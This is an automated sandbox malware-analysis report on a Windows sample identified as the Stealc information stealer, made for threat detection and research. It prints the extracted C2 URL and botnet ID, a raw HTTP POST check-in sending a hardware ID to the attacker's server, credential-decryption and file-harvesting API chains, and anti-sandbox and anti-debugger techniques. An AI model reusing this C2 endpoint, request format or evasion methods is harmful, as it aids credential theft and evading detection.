Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1528897
MD5:555446e29069811f705b562473456397
SHA1:4545adba658522cf1035be16883def9c888c79e3
SHA256:ca41747721e954859ba3e691ac62a90dd426459f5622cdd2729e34c1bc64fdbc
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse usering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 5476 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 555446E29069811F705B562473456397)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.2239077197.000000000116E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000003.2197795166.0000000004D60000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 5476JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 5476JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.3b0000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-08T12:32:11.465876+020020442431Malware Command and Control Activity Detected192.168.2.649727185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.3b0000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003BC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_003BC820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_003B7240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_003B9AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B9B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_003B9B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_003C8EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_003C38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_003C4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003BDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_003BDA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003BE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_003BE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003BED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_003BED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_003C4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003BDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_003BDE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003BBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_003BBE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003BF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_003BF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_003C3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_003B16D0

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49727 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFHDAKJKFCFBGCBGDHCBHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 39 36 35 41 38 37 38 32 46 44 37 32 32 38 34 35 38 32 31 32 37 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 2d 2d 0d 0a Data Ascii: ------AFHDAKJKFCFBGCBGDHCBContent-Disposition: form-data; name="hwid"4965A8782FD72284582127------AFHDAKJKFCFBGCBGDHCBContent-Disposition: form-data; name="build"doma------AFHDAKJKFCFBGCBGDHCB--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_003B4880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFHDAKJKFCFBGCBGDHCBHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 39 36 35 41 38 37 38 32 46 44 37 32 32 38 34 35 38 32 31 32 37 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 2d 2d 0d 0a Data Ascii: ------AFHDAKJKFCFBGCBGDHCBContent-Disposition: form-data; name="hwid"4965A8782FD72284582127------AFHDAKJKFCFBGCBGDHCBContent-Disposition: form-data; name="build"doma------AFHDAKJKFCFBGCBGDHCB--
                Source: file.exe, 00000000.00000002.2239077197.000000000116E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.2239077197.00000000011C9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2239077197.00000000011B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.2239077197.00000000011C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.2239077197.000000000116E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.370

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007780340_2_00778034
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0077D0190_2_0077D019
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006EF09B0_2_006EF09B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007101570_2_00710157
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0077EACC0_2_0077EACC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006562B50_2_006562B5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E63EC0_2_007E63EC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00783BD90_2_00783BD9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00779C470_2_00779C47
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007894460_2_00789446
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007764D40_2_007764D4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0077B4CF0_2_0077B4CF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B249E0_2_007B249E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007805C70_2_007805C7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006C572E0_2_006C572E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0067972D0_2_0067972D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007BCF130_2_007BCF13
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0078578E0_2_0078578E
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 003B45C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: xsbjvjcw ZLIB complexity 0.994823391154661
                Source: file.exe, 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2197795166.0000000004D60000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_003C9600
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_003C3720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\G7H1AHDC.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1847808 > 1048576
                Source: file.exeStatic PE information: Raw size of xsbjvjcw is bigger than: 0x100000 < 0x19d000

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.3b0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;xsbjvjcw:EW;jgzmrfrk:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;xsbjvjcw:EW;jgzmrfrk:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_003C9860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1cb1df should be: 0x1ccbfe
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: xsbjvjcw
                Source: file.exeStatic PE information: section name: jgzmrfrk
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003CB035 push ecx; ret 0_2_003CB048
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0081B088 push ebp; mov dword ptr [esp], eax0_2_0081B0C5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0083508F push ebx; mov dword ptr [esp], ecx0_2_008350E4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0083508F push 644F6CA7h; mov dword ptr [esp], eax0_2_0083511E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00801890 push edx; mov dword ptr [esp], 5D3E46FAh0_2_008018AA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E105D push 3E2B7995h; mov dword ptr [esp], ebx0_2_007E1078
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0081B8BE push 75D9356Dh; mov dword ptr [esp], edx0_2_0081B8FD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0081B8BE push ecx; mov dword ptr [esp], ebx0_2_0081B97D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00778034 push 62E0091Ch; mov dword ptr [esp], ebx0_2_00778062
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00778034 push esi; mov dword ptr [esp], edx0_2_007780CA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00778034 push edi; mov dword ptr [esp], eax0_2_007780FE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00778034 push edi; mov dword ptr [esp], esi0_2_00778170
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00778034 push 69402000h; mov dword ptr [esp], ebp0_2_00778228
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00778034 push esi; mov dword ptr [esp], edi0_2_00778234
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00778034 push eax; mov dword ptr [esp], 7FC8922Fh0_2_00778311
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00778034 push ebx; mov dword ptr [esp], eax0_2_00778354
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00778034 push 1284A7A3h; mov dword ptr [esp], esi0_2_0077835E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00778034 push 27D0C209h; mov dword ptr [esp], ecx0_2_00778387
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00778034 push ebp; mov dword ptr [esp], 2A41ECF1h0_2_007783C7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00778034 push 0D9B48D5h; mov dword ptr [esp], esi0_2_00778410
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00778034 push ebx; mov dword ptr [esp], 4EFA3067h0_2_0077841C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00778034 push 3AB3A41Ch; mov dword ptr [esp], ebp0_2_0077844D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00778034 push 642B7EF2h; mov dword ptr [esp], edi0_2_00778467
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00778034 push ecx; mov dword ptr [esp], edx0_2_007784C3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00778034 push ecx; mov dword ptr [esp], 7D7D9107h0_2_007784E6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00778034 push eax; mov dword ptr [esp], ecx0_2_007785B7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00778034 push 3F00B22Fh; mov dword ptr [esp], eax0_2_00778642
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00778034 push edi; mov dword ptr [esp], 5AF5F8CBh0_2_00778652
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00778034 push 189D5995h; mov dword ptr [esp], edi0_2_00778663
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00778034 push 6266E4B7h; mov dword ptr [esp], edx0_2_00778694
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00778034 push 419FE50Dh; mov dword ptr [esp], esi0_2_007786D9
                Source: file.exeStatic PE information: section name: xsbjvjcw entropy: 7.9535443990541745

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_003C9860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13594
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 611B16 second address: 611B1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78DCBF second address: 78DCC4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77CB2B second address: 77CB2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78CE8C second address: 78CE93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop eax 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78CFEB second address: 78D002 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5ED4EAF483h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78D2A3 second address: 78D2E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F5ED52EEF85h 0x0000000a jnl 00007F5ED52EEF8Ah 0x00000010 push eax 0x00000011 push edx 0x00000012 jbe 00007F5ED52EEF76h 0x00000018 jno 00007F5ED52EEF76h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78D425 second address: 78D42C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78D42C second address: 78D455 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F5ED52EEF84h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jns 00007F5ED52EEF76h 0x00000018 push edi 0x00000019 pop edi 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78D455 second address: 78D461 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jns 00007F5ED4EAF476h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78D604 second address: 78D608 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 790A46 second address: 790A4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 790A4A second address: 790A79 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5ED52EEF82h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jg 00007F5ED52EEF8Bh 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F5ED52EEF7Dh 0x0000001a rdtsc
